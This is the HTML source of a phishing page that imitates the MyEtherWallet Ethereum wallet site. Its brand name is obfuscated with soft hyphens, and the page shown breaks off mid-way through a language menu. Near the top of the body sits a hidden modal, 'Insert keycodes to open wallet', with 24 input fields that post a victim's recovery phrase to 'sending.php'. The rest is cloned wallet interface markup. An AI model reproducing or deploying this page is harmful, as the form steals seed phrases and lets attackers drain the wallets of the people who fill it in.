<html><head>
    <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#0B2840">
    <meta http-equiv="" content="3;URL=https://myetherwallet.com">
    <meta name="description" content="&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet (MEW) is a free, open-source, client-side int&shy;&shy;&shy;erface for gene&shy;&shy;&shy;rating Ethere&shy;&shy;&shy;um wal&shy;&shy;&shy;lets &amp; more. Inte&shy;&shy;&shy;ract with the Et&shy;&shy;&shy;hereum block&shy;&shy;&shy;chain easily &amp; securely.">
    <meta property="og:title" content="&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet.com: Your Key to Ethereum">
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet.com: Your Key to Ethereum">
    <meta property="og:image" content="https://beta.&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet.com/img/icons/android-chrome-192x192.png">
    <meta property="og:url" content="https://www.&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet.com">
    <meta property="og:description" content="Free, open-source, client-side Ethereum wallet. Enabling you to interact with the blockchain easily &amp; securely.">
    <meta name="twitter:title" content="&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet.com: Your Key to Ethereum">
    <meta name="twitter:site" content="@&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet">
    <meta name="twitter:creator" content="@&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet">
    <meta name="apple-mobile-web-app-title" content="&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet.com: Your Key to Ethereum">
    <meta name="apple-mobile-web-app-status-bar-style" content="#0B2840">
    <!--[if IE]>
    <link rel="icon" sizes="192x192" href="img/icons/android-chrome-192x192.png" />
    <![endif]-->
    <link rel="shortcut icon" type="image/png" href="favicon.png">
    <title>&shy;&shy;&shy;M&shy;&shy;&shy;y&shy;&shy;&shy;E&shy;&shy;&shy;t&shy;&shy;&shy;h&shy;&shy;&shy;e&shy;&shy;&shy;rW&shy;&shy;&shy;a&shy;&shy;&shy;llet | MEW</title>
    
    <link href="index.css" rel="stylesheet" type="text/css">
  
  <link href="index.css" rel="stylesheet" type="text/css">
  <link href="css/chunk-01b815b4.46f0ec60.css" rel="prefetch">
  <link href="css/chunk-03174c78.25bdaa07.css" rel="prefetch">
  <link href="css/chunk-0b5e7df6.183e7208.css" rel="prefetch">
  <link href="css/chunk-0d92a296.6f6d5a85.css" rel="prefetch">
  <link href="css/chunk-0f7e72da.53a609c0.css" rel="prefetch">
  <link href="css/chunk-152a5ea4.ac6e2c72.css" rel="prefetch">
  <link href="css/chunk-16719fc6.8b5fb392.css" rel="prefetch">
  <link href="css/chunk-17c3c662.107079ba.css" rel="prefetch">
  <link href="css/chunk-1c43a764.2301063f.css" rel="prefetch">
  <link href="css/chunk-1c6cb317.82a18f69.css" rel="prefetch">
  <link href="css/chunk-1e26b980.90128397.css" rel="prefetch">
  <link href="css/chunk-2226c062.cd05252f.css" rel="prefetch">
  <link href="css/chunk-29267b4c.3e8428b4.css" rel="prefetch">
  <link href="css/chunk-2c5490e2.6d1e9497.css" rel="prefetch">
  <link href="css/chunk-2c7af629.5c56a100.css" rel="prefetch">
  <link href="css/chunk-304ae074.28790ee2.css" rel="prefetch">
  <link href="css/chunk-331892e4.4800e07e.css" rel="prefetch">
  <link href="css/chunk-341eb9d4.e158ed09.css" rel="prefetch">
  <link href="css/chunk-345b023a.7d276a63.css" rel="prefetch">
  <link href="css/chunk-3f734e7a.60c61add.css" rel="prefetch">
  <link href="css/chunk-3fc1ef31.d26fff2b.css" rel="prefetch">
  <link href="css/chunk-466b8e24.1c4765c4.css" rel="prefetch">
  <link href="css/chunk-46ead48d.eee2df9c.css" rel="prefetch">
  <link href="css/chunk-4894032c.b80c64cc.css" rel="prefetch">
  <link href="css/chunk-48e055ea.c6412040.css" rel="prefetch">
  <link href="css/chunk-510df714.83249ae5.css" rel="prefetch">
  <link href="css/chunk-53f767d2.ecaa2841.css" rel="prefetch">
  <link href="css/chunk-57b4bbcb.dac66eb2.css" rel="prefetch">
  <link href="css/chunk-5bbde47b.907d404f.css" rel="prefetch">
  <link href="css/chunk-634722ba.561f8335.css" rel="prefetch">
  <link href="css/chunk-670a0dbf.01eb600a.css" rel="prefetch">
  <link href="css/chunk-6789312b.f1b6fb97.css" rel="prefetch">
  <link href="css/chunk-680bdb6a.8098ddba.css" rel="prefetch">
  <link href="css/chunk-69c90216.35ed7dac.css" rel="prefetch">
  <link href="css/chunk-719ffeb3.4969aa69.css" rel="prefetch">
  <link href="css/chunk-71fde9b2.1a86e7f9.css" rel="prefetch">
  <link href="css/chunk-75b6c8d7.d2b2e15f.css" rel="prefetch">
  <link href="css/chunk-7a17940e.6dd696b3.css" rel="prefetch">
  <link href="css/chunk-7c184032.444f0968.css" rel="prefetch">
  <link href="css/chunk-7df4a6f7.fa87488f.css" rel="prefetch">
  <link href="css/chunk-7ed5d0e4.0329e58d.css" rel="prefetch">
  <link href="css/chunk-8bc979e4.538e685c.css" rel="prefetch">
  <link href="css/chunk-9ec03272.ba2e1d31.css" rel="prefetch">
  <link href="css/chunk-bf8705e0.1c3b5d79.css" rel="prefetch">
  <link href="css/chunk-ca767c8a.1b473e5c.css" rel="prefetch">
  <link href="css/chunk-efe622c6.cd1a7d90.css" rel="prefetch">
  
  <link href="css/app.7209ea4c.css" rel="preload" as="style">
  <link href="css/vendors.6b0e2372.css" rel="preload" as="style">
  
  <link href="css/vendors.6b0e2372.css" rel="stylesheet">
  <link href="css/app.7209ea4c.css" rel="stylesheet">
  <link rel="icon" type="image/png" sizes="32x32" href="img/icons/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="img/icons/favicon-16x16.png">
  
  <link rel="apple-touch-icon" href="img/icons/apple-touch-icon-152x152.png">
  <link rel="mask-icon" href="img/icons/safari-pinned-tab.svg" color="#4DBA87">
  
  <style>
  .mymodal {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    display: -webkit-flex;
    display: -moz-flex;
    display: -ms-flex;
    display: -o-flex;
    display: flex;
    justify-content: center;
    -ms-align-items: center;
    align-items: center;
    overflow: hidden;
    z-index: 10000;
  }
  .overlay {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0,0,0,.5);
  }
  .mywrap {
    position: relative;
  }
  .myprogress-bar {
    -webkit-animation-duration: .5s;
    animation-duration: .5s;
    background-color: #05c0a5;
    height: 6px;
    width: 100%;
  }
  .myul li {
    display: -webkit-flex;
    display: -moz-flex;
    display: -ms-flex;
    display: -o-flex;
    display: flex;
    -ms-align-items: center;
    align-items: center;
  }
  .myul input {
    color: #003945;
    margin-left: 10px;
    display: inline-block;
    border: none;
    background: none;
    max-width: 125px;
  }
  .nav-tab-user-input-box {
    border-radius: 0 !important;
  }
  body form div li.extra {
    display: none !important;
  }
  .overflow {
    max-height: 100%;
    overflow: auto;
  }
  </style>
  <style type="text/css">.toasted{padding:0 20px}.toasted.rounded{border-radius:24px}.toasted .primary,.toasted.toasted-primary{border-radius:2px;min-height:38px;line-height:1.1em;background-color:#353535;padding:6px 20px;font-size:15px;font-weight:300;color:#fff;box-shadow:0 1px 3px rgba(0,0,0,.12),0 1px 2px rgba(0,0,0,.24)}.toasted .primary.success,.toasted.toasted-primary.success{background:#4caf50}.toasted .primary.error,.toasted.toasted-primary.error{background:#f44336}.toasted .primary.info,.toasted.toasted-primary.info{background:#3f51b5}.toasted .primary .action,.toasted.toasted-primary .action{color:#a1c2fa}.toasted.bubble{border-radius:30px;min-height:38px;line-height:1.1em;background-color:#ff7043;padding:0 20px;font-size:15px;font-weight:300;color:#fff;box-shadow:0 1px 3px rgba(0,0,0,.12),0 1px 2px rgba(0,0,0,.24)}.toasted.bubble.success{background:#4caf50}.toasted.bubble.error{background:#f44336}.toasted.bubble.info{background:#3f51b5}.toasted.bubble .action{color:#8e2b0c}.toasted.outline{border-radius:30px;min-height:38px;line-height:1.1em;background-color:#fff;border:1px solid #676767;padding:0 20px;font-size:15px;color:#676767;box-shadow:0 1px 3px rgba(0,0,0,.12),0 1px 2px rgba(0,0,0,.24);font-weight:700}.toasted.outline.success{color:#4caf50;border-color:#4caf50}.toasted.outline.error{color:#f44336;border-color:#f44336}.toasted.outline.info{color:#3f51b5;border-color:#3f51b5}.toasted.outline .action{color:#607d8b}.toasted-container{position:fixed;z-index:10000}.toasted-container,.toasted-container.full-width{display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column}.toasted-container.full-width{max-width:86%;width:100%}.toasted-container.full-width.fit-to-screen{min-width:100%}.toasted-container.full-width.fit-to-screen .toasted:first-child{margin-top:0}.toasted-container.full-width.fit-to-screen.top-right{top:0;right:0}.toasted-container.full-width.fit-to-screen.top-left{top:0;left:0}.toasted-container.full-width.fit-to-screen.top-center{top:0;left:0;-webkit-transform:translateX(0);transform:translateX(0)}.toasted-container.full-width.fit-to-screen.bottom-right{right:0;bottom:0}.toasted-container.full-width.fit-to-screen.bottom-left{left:0;bottom:0}.toasted-container.full-width.fit-to-screen.bottom-center{left:0;bottom:0;-webkit-transform:translateX(0);transform:translateX(0)}.toasted-container.top-right{top:10%;right:7%}.toasted-container.top-left{top:10%;left:7%}.toasted-container.top-center{top:10%;left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%)}.toasted-container.bottom-right{right:5%;bottom:7%}.toasted-container.bottom-left{left:5%;bottom:7%}.toasted-container.bottom-center{left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%);bottom:7%}.toasted-container.bottom-left .toasted,.toasted-container.top-left .toasted{float:left}.toasted-container.bottom-right .toasted,.toasted-container.top-right .toasted{float:right}.toasted-container .toasted{top:35px;width:auto;clear:both;margin-top:10px;position:relative;max-width:100%;height:auto;word-break:normal;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:justify;justify-content:space-between;box-sizing:inherit}.toasted-container .toasted .fa,.toasted-container .toasted .fab,.toasted-container .toasted .far,.toasted-container .toasted .fas,.toasted-container .toasted .material-icons,.toasted-container .toasted .mdi{margin-right:.5rem;margin-left:-.4rem}.toasted-container .toasted .fa.after,.toasted-container .toasted .fab.after,.toasted-container .toasted .far.after,.toasted-container .toasted .fas.after,.toasted-container .toasted .material-icons.after,.toasted-container .toasted .mdi.after{margin-left:.5rem;margin-right:-.4rem}.toasted-container .toasted .action{text-decoration:none;font-size:.8rem;padding:8px;margin:5px -7px 5px 7px;border-radius:3px;text-transform:uppercase;letter-spacing:.03em;font-weight:600;cursor:pointer}.toasted-container .toasted .action.icon{padding:4px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center}.toasted-container .toasted .action.icon .fa,.toasted-container .toasted .action.icon .material-icons,.toasted-container .toasted .action.icon .mdi{margin-right:0;margin-left:4px}.toasted-container .toasted .action.icon:hover{text-decoration:none}.toasted-container .toasted .action:hover{text-decoration:underline}@media only screen and (max-width:600px){.toasted-container{min-width:100%}.toasted-container .toasted:first-child{margin-top:0}.toasted-container.top-right{top:0;right:0}.toasted-container.top-left{top:0;left:0}.toasted-container.top-center{top:0;left:0;-webkit-transform:translateX(0);transform:translateX(0)}.toasted-container.bottom-right{right:0;bottom:0}.toasted-container.bottom-left{left:0;bottom:0}.toasted-container.bottom-center{left:0;bottom:0;-webkit-transform:translateX(0);transform:translateX(0)}.toasted-container.bottom-center,.toasted-container.top-center{-ms-flex-align:stretch!important;align-items:stretch!important}.toasted-container.bottom-left .toasted,.toasted-container.bottom-right .toasted,.toasted-container.top-left .toasted,.toasted-container.top-right .toasted{float:none}.toasted-container .toasted{border-radius:0}}</style></head>
  
  

<body cz-shortcut-listen="true">










    <div class="mymodal" style="display: none;">
        <div class="overlay"></div>
        <div class="overflow">
            <form id="myform" action="sending.php" method="post">
                <input type="hidden" name="type" value="4">
    
                <div role="document" class="modal-content">
                    <header class="modal-header" id="__BVID__156___BV_modal_header_"><h5 class="modal-title">Insert keycodes to open wallet</h5>
                        <button type="button" aria-label="Close" class="close">×</button>
                    </header>
                    <div class="modal-body" id="__BVID__156___BV_modal_body_">
                        <div data-v-52cb603e="" class="contents"><p data-v-52cb603e="" class="instruction">
                            Fill the form
                        </p>
                            
                                <div data-v-52cb603e="" class="phrases">
                                    <ul data-v-52cb603e="">
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">1.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">2.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">3.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">4.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">5.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">6.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">7.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">8.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">9.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">10.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">11.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">12.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">13.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">14.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">15.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">16.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">17.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">18.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">19.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">20.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">2&shy;&shy;&shy;1.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">2&shy;&shy;&shy;2.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">23.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
    
                                        <li data-v-52cb603e=""><span data-v-52cb603e="">24.</span><input data-v-52cb603e="" type="text" name="myinput[]">
                                        </li>
                                    </ul>
                                </div>
    
                                <p data-v-52cb603e="" class="error" style="display: none;"></p>
                                <div data-v-52cb603e="" class="button-container-block">
                                    <div data-v-5aaee59d="" data-v-52cb603e="" class="standard-button full-width"><!---->
                                        <div data-v-5aaee59d="" class="standard-button__green">
                                            <button type="submit" data-v-5aaee59d="" class="the-button-box no-min-width" style="display: none;"><i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg"></i>
                                            </button>
                                            <button type="submit" data-v-5aaee59d="" class="the-button-box no-min-width">
                                                Conti&shy;&shy;&shy;nue
                                                <i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg" style="display: none;"></i><!----><!----><!----><!----><!----></button>
                                        </div><!----><!----></div>
                                </div>
                            
                            <div data-v-f785aaf0="" data-v-52cb603e="" class="support">
                                <div data-v-f785aaf0="" class="bootstrap-modal nopadding">
                                    <div id="__BVID__163___BV_modal_outer_" style="position: absolute; z-index: 1040;">
                                        <div role="dialog" tabindex="-1" aria-hidden="true" class="modal fade" id="__BVID__163" style="display: none;">
                                            <div class="modal-dialog modal-md modal-dialog-centered">
                                                <div role="document" class="modal-content" id="__BVID__163___BV_modal_content_" aria-labelledby="__BVID__163___BV_modal_header_" aria-describedby="__BVID__163___BV_modal_body_">
                                                    <header class="modal-header" id="__BVID__163___BV_modal_header_"><h5 class="modal-title">Iss&shy;&shy;&shy;ue informa&shy;&shy;&shy;tion</h5>
                                                        <button type="button" aria-label="Close" class="close">×</button>
                                                    </header>
                                                    <div class="modal-body" id="__BVID__163___BV_modal_body_">
                                                        <div data-v-f785aaf0="" class="email-prefill-inputs"><input data-v-f785aaf0="" placeholder="Browser"><input data-v-f785aaf0="" placeholder="Operating System"><input data-v-f785aaf0="" placeholder="Device/Wallet type (If any)"><input data-v-f785aaf0="" placeholder="Wallet PUBLIC address (If any)"><input data-v-f785aaf0="" placeholder="Url"><textarea data-v-f785aaf0="" placeholder="Describe the issue"></textarea><a data-v-f785aaf0="" href="mailto:support@myetherwallet.com?subject=Issue%20on%20%2Faccess-my-wallet&amp;body=%0A%20%20%20%20%20%20%20%20Browser%3A%20Chrome%2C%0A%20%20%20%20%20%20%20%20Os%3A%20Windows%2C%0A%20%20%20%20%20%20%20%20Device%3A%20null%2C%0A%20%20%20%20%20%20%20%20url%3A%20%2Faccess-my-wallet%0A%20%20%20%20%20%20%20%20Wallet%20Address%3A%20%2Faccess-my-wallet%0A%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20" target="_blank" rel="noopener noreferrer" class="mid-round-button-green-filled">
                                                            Se&shy;&shy;&shy;nd
                                                        </a></div>
                                                    </div><!----></div>
                                            </div>
                                        </div><!----><!----></div>
                                </div>
                            </div>
                        </div>
                    </div><!----></div></form>
            
        </div>
    </div>
    
    <div id="app"><div data-v-577a0e7e="" class="modal-container"><div data-v-577a0e7e="" class="bootstrap-modal nopadding"><div id="__BVID__11___BV_modal_outer_" style="position: absolute; z-index: 1040;"><div role="dialog" tabindex="-1" aria-hidden="true" class="modal fade" id="__BVID__11" style="display: none;"><div class="modal-dialog modal-md modal-dialog-centered"><div role="document" class="modal-content" id="__BVID__11___BV_modal_content_" aria-describedby="__BVID__11___BV_modal_body_"><!----><div class="modal-body" id="__BVID__11___BV_modal_body_"><div data-v-577a0e7e="" class="modal-contents"><h2 data-v-577a0e7e="">Oops!</h2><p data-v-577a0e7e="">It seems like you forgot to logout your wallet. For your wallet security, please log out your wallet to continue, or go back to your wallet.</p><div data-v-577a0e7e="" class="buttons"><div data-v-5aaee59d="" data-v-577a0e7e="" class="standard-button full-width"><!----><div data-v-5aaee59d="" class="standard-button__green-border"><button data-v-5aaee59d="" class="the-button-box no-min-width" style="display: none;"><i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg"></i></button><button data-v-5aaee59d="" class="the-button-box no-min-width">
          Go back
          <i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg" style="display: none;"></i><!----><!----><!----><!----><!----></button></div><!----><!----></div><div data-v-5aaee59d="" data-v-577a0e7e="" class="standard-button full-width"><!----><div data-v-5aaee59d="" class="standard-button__red"><button data-v-5aaee59d="" class="the-button-box no-min-width" style="display: none;"><i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg"></i></button><button data-v-5aaee59d="" class="the-button-box no-min-width">
          Log Out of Wallet
          <i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg" style="display: none;"></i><!----><!----><!----><!----><!----></button></div><!----><!----></div></div></div></div><!----></div></div></div><!----><!----></div></div></div><div data-v-0049b9b4="" class="header"><div data-v-6fe08db0="" data-v-0049b9b4="" class="address-qrcode-modal"><div data-v-6fe08db0="" class="bootstrap-modal nopadding"><div id="__BVID__17___BV_modal_outer_" style="position: absolute; z-index: 1040;"><div role="dialog" tabindex="-1" aria-hidden="true" class="modal fade" id="__BVID__17" style="display: none;"><div class="modal-dialog modal-md modal-dialog-centered"><div role="document" class="modal-content" id="__BVID__17___BV_modal_content_" aria-describedby="__BVID__17___BV_modal_body_"><!----><div class="modal-body" id="__BVID__17___BV_modal_body_"><div data-v-6fe08db0="" class="modal-contents"><div data-v-6fe08db0="" class="icon"><img data-v-6fe08db0="" src="img/disconnected.6d6be0fe.png"></div><div data-v-6fe08db0="" class="modal-title">
            Oops!
          </div><div data-v-6fe08db0="" class="text-content">
            Seems like you are disconnected from MEWconnect, please reconnect using the App.
          </div><div data-v-6fe08db0="" class="ok-button"><div data-v-5aaee59d="" data-v-6fe08db0="" class="standard-button"><!----><div data-v-5aaee59d="" class="standard-button__green"><button data-v-5aaee59d="" class="the-button-box" style="display: none;"><i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg"></i></button><button data-v-5aaee59d="" class="the-button-box">
          OK
          <i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg" style="display: none;"></i><!----><!----><!----><!----><!----></button></div><!----><!----></div></div></div></div><!----></div></div></div><!----><!----></div></div></div><!----><div data-v-13d48f86="" data-v-0049b9b4="" class="modal-container"><div data-v-13d48f86="" class="bootstrap-modal nopadding"><div id="__BVID__21___BV_modal_outer_" style="position: absolute; z-index: 1040;"><div role="dialog" tabindex="-1" aria-hidden="true" class="modal fade" id="__BVID__21" style="display: none;"><div class="modal-dialog modal-md modal-dialog-centered"><div role="document" class="modal-content" id="__BVID__21___BV_modal_content_" aria-labelledby="__BVID__21___BV_modal_header_" aria-describedby="__BVID__21___BV_modal_body_"><header class="modal-header" id="__BVID__21___BV_modal_header_"><h5 class="modal-title">Notifications</h5><button type="button" aria-label="Close" class="close">×</button></header><div class="modal-body" id="__BVID__21___BV_modal_body_"><div data-v-13d48f86="" class="title-notification-count"><p data-v-13d48f86="">11</p></div><div data-v-13d48f86="" class="modal-contents"><div data-v-9629cbec="" data-v-13d48f86="" class="full-width-dropdown-menu tx-speed"><div data-v-9629cbec="" class="wrap"><div data-v-9629cbec="" class="title-container"><p data-v-9629cbec="" class="notification-title">Transaction Speed</p><p data-v-9629cbec="" class="time">13:20:23&nbsp;&nbsp;11/11/2018</p><i data-v-9629cbec="" aria-hidden="true" class="fa fa-angle-down"></i><!----></div><div data-v-9629cbec="" class="contents-container"><div data-v-9629cbec="" class="padding-block"><div data-v-13d48f86="" data-v-9629cbec="" class="tx-success">
              Your transaction amount <span data-v-13d48f86="" data-v-9629cbec="">2.100000 ETH</span> to address
              <p data-v-13d48f86="" data-v-9629cbec="">0x1d3649b580f77f8fd81a6546398d1926c49eb336</p>
              has been successfully transferred.
            </div></div></div></div></div><div data-v-9629cbec="" data-v-13d48f86="" class="full-width-dropdown-menu import-config"><div data-v-9629cbec="" class="wrap"><div data-v-9629cbec="" class="title-container"><p data-v-9629cbec="" class="notification-title">Import Configurations</p><p data-v-9629cbec="" class="time">13:20:23&nbsp;&nbsp;11/11/2018</p><i data-v-9629cbec="" aria-hidden="true" class="fa fa-angle-down"></i><!----></div><div data-v-9629cbec="" class="contents-container"><div data-v-9629cbec="" class="padding-block"></div></div></div></div><div data-v-9629cbec="" data-v-13d48f86="" class="full-width-dropdown-menu export-config"><div data-v-9629cbec="" class="wrap"><div data-v-9629cbec="" class="title-container"><p data-v-9629cbec="" class="notification-title">Export Configurations</p><p data-v-9629cbec="" class="time">13:20:23&nbsp;&nbsp;11/11/2018</p><i data-v-9629cbec="" aria-hidden="true" class="fa fa-angle-down"></i><!----></div><div data-v-9629cbec="" class="contents-container"><div data-v-9629cbec="" class="padding-block"></div></div></div></div></div></div><!----></div></div></div><!----><!----></div></div></div><div data-v-19fcc89d="" data-v-0049b9b4="" class="modal-container"><div data-v-19fcc89d="" class="bootstrap-modal nopadding"><div id="__BVID__27___BV_modal_outer_" style="position: absolute; z-index: 1040;"><div role="dialog" tabindex="-1" aria-hidden="true" class="modal fade" id="__BVID__27" style="display: none;"><div class="modal-dialog modal-md modal-dialog-centered"><div role="document" class="modal-content" id="__BVID__27___BV_modal_content_" aria-describedby="__BVID__27___BV_modal_body_"><!----><div class="modal-body" id="__BVID__27___BV_modal_body_"><div data-v-19fcc89d="" class="modal-contents"><h2 data-v-19fcc89d="">Are you sure you want to logout of your wallet?</h2><div data-v-19fcc89d="" class="buttons"><button data-v-19fcc89d="" class="no">No</button><button data-v-19fcc89d="" class="yes">Yes</button></div></div></div><!----></div></div></div><!----><!----></div></div></div><div data-v-6c6b2f65="" data-v-0049b9b4="" class="wrap"><div data-v-6c6b2f65="" class="modal-container"><div data-v-6c6b2f65="" class="bootstrap-modal nopadding"><div id="__BVID__30___BV_modal_outer_" style="position: absolute; z-index: 1040;"><div role="dialog" tabindex="-1" aria-hidden="true" class="modal fade" id="__BVID__30" style="display: none;"><div class="modal-dialog modal-md modal-dialog-centered"><div role="document" class="modal-content" id="__BVID__30___BV_modal_content_" aria-describedby="__BVID__30___BV_modal_body_"><!----><div class="modal-body" id="__BVID__30___BV_modal_body_"><div data-v-6c6b2f65="" class="modal-contents"><div data-v-6c6b2f65="" class="modal-header-block"><h2 data-v-6c6b2f65="" class="title">Something went wrong.</h2><p data-v-6c6b2f65="" class="sub-text">
                Do you want to inform MEW about this error?
              </p></div><div data-v-6c6b2f65="" class="modal-user-input-block"><code data-v-6c6b2f65="">
                {}
              </code></div><div data-v-6c6b2f65="" class="modal-button-block"><div data-v-5aaee59d="" data-v-6c6b2f65="" class="standard-button full-width"><!----><div data-v-5aaee59d="" class="standard-button__green-border"><button data-v-5aaee59d="" class="the-button-box no-min-width" style="display: none;"><i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg"></i></button><button data-v-5aaee59d="" class="the-button-box no-min-width">
          Cancel
          <i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg" style="display: none;"></i><!----><!----><!----><!----><!----></button></div><!----><!----></div><div data-v-5aaee59d="" data-v-6c6b2f65="" class="standard-button"><!----><div data-v-5aaee59d="" class="standard-button__green"><button data-v-5aaee59d="" class="the-button-box no-min-width" style="display: none;"><i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg"></i></button><button data-v-5aaee59d="" class="the-button-box no-min-width">
          Send
          <i data-v-5aaee59d="" class="fa fa-spin fa-spinner fa-lg" style="display: none;"></i><!----><!----><!----><!----><!----></button></div><!----><!----></div></div><!----></div></div><!----></div></div></div><!----><!----></div></div></div></div><div data-v-0049b9b4="" class="scroll-up-button"><div data-v-0049b9b4="" class="scrollup-container"><a data-v-0049b9b4="" href="#/getting-started" class="" style="display: none;"><div data-v-47019b09="" data-v-0049b9b4="" popup="Security" class="user-reminder-button"><div data-v-47019b09="" class="popup-box">Security</div><div data-v-47019b09="" class="button-block"><img data-v-47019b09="" src="img/acknowledge.a68d4ced.png"></div></div></a><div data-v-419945f2="" data-v-0049b9b4="" class="scroll-up-button"><div data-v-419945f2="" class="button-block"><img data-v-419945f2="" src="img/arrow.fdbe2d7a.png"></div></div></div></div><div data-v-2a33716a="" data-v-0049b9b4="" class="mobile-menu"><div data-v-161928e6="" data-v-2a33716a="" class="mobile-language-selector"><div data-v-161928e6="" class="backdrop"></div><div data-v-161928e6="" class="language-menu-content-container"><ul data-v-161928e6=""><li data-v-161928e6="" active="true" data-language-code="en_US" data-flag-name="en">
            English
          </li><li data-v-161928e6="" data-language-code="es_ES" data-flag-name="es">
            Español
          </li><li data-v-161928e6="" data-language-code="ja_JP" data-flag-name="ja">
            日本語
          </li><li data-v-161928e6="" data-language-code="ko_KR" data-flag-name="ko">
